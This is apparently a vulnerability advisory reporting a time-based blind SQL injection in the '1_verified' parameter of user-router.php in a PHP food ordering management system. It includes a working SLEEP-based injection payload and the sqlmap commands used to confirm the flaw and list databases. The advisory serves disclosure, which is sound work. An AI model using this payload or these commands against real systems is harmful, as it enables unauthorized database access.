SQL Injection vulnerability was discovered from Sourcecodester Food Ordering Management System 1.0 (user-router.php)
Affected Project: Sourcecodester Food Ordering Management System 1.0 Official Website: https://www.sourcecodester.com/php/15689/food-ordering-management-system-php-and-mysql-free-source-code.html Version: 1.0
Related Code file: user-router.php
Injection parameter: 1_verified
-
Lack of Input Validation and Sanitization: The '1_verified' parameter fields are directly used in the SQL query without any sanitization or validation. This allows an attacker to manipulate the SQL query by injecting malicious SQL code.
-
Use of Plain SQL Queries: The script likely uses plain SQL queries to interact with the database. Without prepared statements, this approach is highly vulnerable to SQL injection.
Below is the users.php. By clicking on "Modify", we can access user-router.php:
http://172.16.76.1/foms/users.php
We will first intercept the traffic using Burp Suite:
Save the intercepted request to a .txt file and execute sqlmap towards it.
parameter 1_verified is vulnerable to time-based blind sql injection
Below commands verifies the vulnerability:
sqlmap -r foms_user_router.txt --batch
---
Parameter: 1_verified (POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: 1_role=Administrator&1_verified=1' AND (SELECT 7078 FROM (SELECT(SLEEP(5)))GiGD) AND 'QLkI'='QLkI&1_deleted=0&1_balance=2000&4_role=Customer&4_verified=1&4_deleted=0&4_balance=1224&5_role=Customer&5_verified=0&5_deleted=0&5_balance=2000&6_role=Customer&6_verified=0&6_deleted=0&6_balance=2000&75_role=Customer&75_verified=0&75_deleted=0&75_balance=2001&action=
---
Below commnd will list databases:
sqlmap -r foms_user_router.txt --batch --dbs